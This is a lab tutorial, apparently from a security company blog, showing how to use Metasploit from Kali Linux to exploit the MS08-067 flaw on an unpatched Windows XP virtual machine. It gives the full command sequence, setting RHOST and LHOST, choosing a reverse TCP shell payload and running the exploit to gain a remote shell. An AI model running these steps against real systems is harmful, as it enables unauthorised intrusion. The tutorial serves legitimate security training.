- Install the latest version of Virtualbox based on your host o\/s from (https:\/\/www.virtualbox.org\/wiki\/Downloads<\/a>)<\/li>
- Download and install Kali Linux 2018.2 ISO as Virtualbox VM and set Networking to Bridged mode for this VM.<\/li>
- Buy and Install a Fresh Windows XP SP2 ISO with no updates installed as Virtualbox VM and set Networking to Bridged mode for this VM.<\/li>
- It is recommended to confirm if Windows XP VM we have installed is Missing ms08\u2013067 Update\u200a\u2014\u200a(https:\/\/docs.microsoft.com\/en-us\/security-updates\/securitybulletins\/2008\/ms08-067<\/a>) and if you found this update installed, kindly uninstall this update.<\/li><\/ol>\n\n\n\n
- We need Kali Linux 2018.2 as Kali comes with Metasploit Framework pre-installed.<\/li>
- We need Target Windows machine to explore the steps involved in using Metasploit to exploit MS08\u2013067: Vulnerability in Server Service Could Allow Remote Code Execution (https:\/\/www.cvedetails.com\/cve\/CVE-2008-4250\/<\/a>)<\/li><\/ul>\n\n\n\n
<\/span>Starting Metasploit Framework in Kali VM:<\/strong><\/span><\/h2>\n\n\n\n
1) Start the PostgreSQL database with the following command in Kali Terminal<\/p>\n\n\n\n
service postgresql start\n<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/2_b078c9e73bf6b7737a01fb68e070e18e_1000.png\")
<\/figure><\/div>\n\n\n\n2) Now we can start the Metasploit service with the following command in Kali Terminal<\/p>\n\n\n\n
service metasploit start<\/code><\/pre>\n\n\n\n3) Once metasploit service has started now we can start metasploit text based console with the following command in Kali Terminal<\/p>\n\n\n\n
msfconsole<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/3_b86b52e4c077eb41ce29f7f9007dbcb3_1000.png\")
<\/figure><\/div>\n\n\n\n\n\n<\/span>Basics of Metasploit Framework via exploitation of ms08\u2013067 vulnerability in Windows XP VM:<\/strong><\/span><\/h2>\n\n\n\n
1) Metasploit search command usage<\/h3>\n\n\n\n
We will use search command to search for if any module available in metasploit for vulnerability in focus which is ms08\u2013067, hence enter the following command in kali terminal<\/p>\n\n\n\n
search ms08\u2013067<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/4_bd6c1cc168c2425e46c4a9ac43e279a3_1000.png\")
<\/figure><\/div>\n\n\n\n2) Metasploit Info command usage<\/h3>\n\n\n\n
Now in order to gather detailed information about available metasploit module for ms08\u2013067 vulnerability, we will enter the following command in kali terminal<\/p>\n\n\n\n
Info exploit\/windows\/smb\/ms08_067_netapi<\/code><\/pre>\n\n\n\n![\"\"\/](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/5_09f78cc9842fe65ceb284dd7023fecde_1000.png\")
<\/figure>\n\n\n\nThe key features to be noticed from info command results are mentioned below:<\/p>\n\n\n\n
Platform, Rank, Privileged, Available Targets, Basic Options, Payload Information etc.<\/p>\n\n\n\n
- Platform\u200a<\/strong>: \u200aTarget Operating Systems in which this module will work like Windows or Linux or Android<\/li>
- Rank<\/strong>\u200a: \u200aAlways recommended to choose exploits with a better ranking like Excellent or Great.<\/li>
- Privileged<\/strong>\u200a: \u200aGives idea if this module will provide or need high privileges on the Target<\/li>
- Available Targets:<\/strong> \u200aLists all possible targets that can be exploited by this module<\/li>
- Basic Options:<\/strong> \u200aLists the options which can be set before using this module against the target. Allowing the user to customize various basic options based on attacker needs. It informs us of the mandatory options which need to be set for the module to run.<\/li>
- Payload Information<\/strong>\u200a: \u200aLists the information which helps us decide which are payloads that are compatible with a specific exploit because payloads help us in post exploitation once the target is in our control.<\/li><\/ul>\n\n\n\n
Related Blog – Astra’s Sample Penetration Testing Report<\/a><\/em><\/strong><\/p>\n\n\n\n
3) Metasploit use command usage<\/h3>\n\n\n\n
Once we confirm the specific metasploit module (exploit) to use, we can execute the command below to use the specific exploit available for ms08\u2013067 vulnerability.<\/p>\n\n\n\n
use windows\/smb\/ms08_067_netapi<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/6_97548802d98ea568fed5322894a5504c_1000.png\")
<\/figure><\/div>\n\n\n\n4) Setting up the Module Options in Metasploit<\/h3>\n\n\n\n
Once you have chosen specific exploit, enter the following command to list all options available for this exploit module and also notice the column Required in image below, It is mandatory to fill the options where the value of Required is yes.<\/p>\n\n\n\n
show options<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/7_4aea4f4220d69f5166e99ce7f8e37d31_1000.png\")
<\/figure><\/div>\n\n\n\n5) Setting RHOST to Target Windows XP VM IP Address<\/h3>\n\n\n\n
IP Address of Windows XP VM (Found by entering ipconfig command in cmd of Windows XP VM).<\/p>\n\n\n\n
In Kali Terminal enter the command below to set RHOST as Windows XP VM<\/p>\n\n\n\n
Set RHOST 192.168.0.8<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/8_fe1105f9c3da09b5148523c58c1f8217_1000.png\")
<\/figure><\/div>\n\n\n\nNow we can go ahead and change other options available such as RPORT and SMBPIPE to user defined values as per our need but for the sake of following through this article, we will leave all other options as default values set works fine for this exploit.<\/p>\n\n\n\n
6) Using an Available Target for specific Metasploit Module<\/h4>\n\n\n\n
Now we can enter the command mentioned below to list all available targets for our (ms08_067_netapi) module<\/p>\n\n\n\n
show targets<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/9_22363dcc70b0852e18ec97efaacbf387_1000.png\")
<\/figure><\/div>\n\n\n\nWe can set specific target based on operating system our target is running by entering the command below:<\/p>\n\n\n\n
set Target (Target Number)<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/10_7c71ebcde344479a7fc2ca112d0802b4_1000.png\")
<\/figure><\/div>\n\n\n\nBut in this tutorial, we will leave the default option of Automatic Targeting.<\/p>\n\n\n\n
Related Blog – Penetration Testing<\/a><\/em><\/strong><\/p>\n\n\n\n
7) Selecting and using any of Compatible Payloads for this Exploit module<\/h3>\n\n\n\n
Enter the following command in terminal to list all compatible payloads available for this exploit.<\/p>\n\n\n\n
show payloads<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/11_57568322a64038d93ad94ce9c3ddee2d_1000.png\")
<\/figure><\/div>\n\n\n\nNow we can set any of best payloads, let\u2019s say windows\u00e0shell_reverse_tcp by using the command below<\/p>\n\n\n\n
set payload windows\/shell_reverse_tcp<\/code><\/pre>\n\n\n\n8) Setting up Payload Options before exploitation<\/h3>\n\n\n\n
show options<\/code><\/pre>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/12_60c10bd0635a9604e70df703e435d99a_1000.png\")
<\/figure>\n\n\n\nEnter the above command in terminal to view the options set for Payload and Module. We have already set the necessary options for module, now since our payload is a reverse shell, we need to set value for LHOST option to Kali Linux by using command mentioned below:<\/p>\n\n\n\n
set LHOST 192.168.0.7<\/code><\/pre>\n\n\n\n9) Exploiting the Target with Metasploit<\/h3>\n\n\n\n
Now enter the exploit <\/strong>command in terminal now to get a command shell on our Target.<\/p>\n\n\n\n
![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/13_c5b7d2a0b90bac456407cebaaee8e6d6_1000.png\")
<\/figure><\/div>\n\n\n\n10) Proof of Exploitation<\/h3>\n\n\n\n
Now we can execute some of windows commands to get information regarding the compromised machine using commands systeminfo<\/strong> and ipconfig<\/strong> as shown below:<\/p>\n\n\n\n
![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/14_77afcd130103e6e2ae71e550f73d1fc1_1000.png\")
<\/figure><\/div>\n\n\n\n![\"Metasploit](\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/images.storychief.com\/account_5336\/15_294790904c64c860ff4a09d16d186da3_1000.png\")
<\/figure><\/div>\n\n\n\nStay Tuned, we will explore Post Exploitation with Metasploit (Meterpreter Basics) in Part 2 of this article<\/a>.<\/p>\n\n\n\n
- Rank<\/strong>\u200a: \u200aAlways recommended to choose exploits with a better ranking like Excellent or Great.<\/li>
- Platform\u200a<\/strong>: \u200aTarget Operating Systems in which this module will work like Windows or Linux or Android<\/li>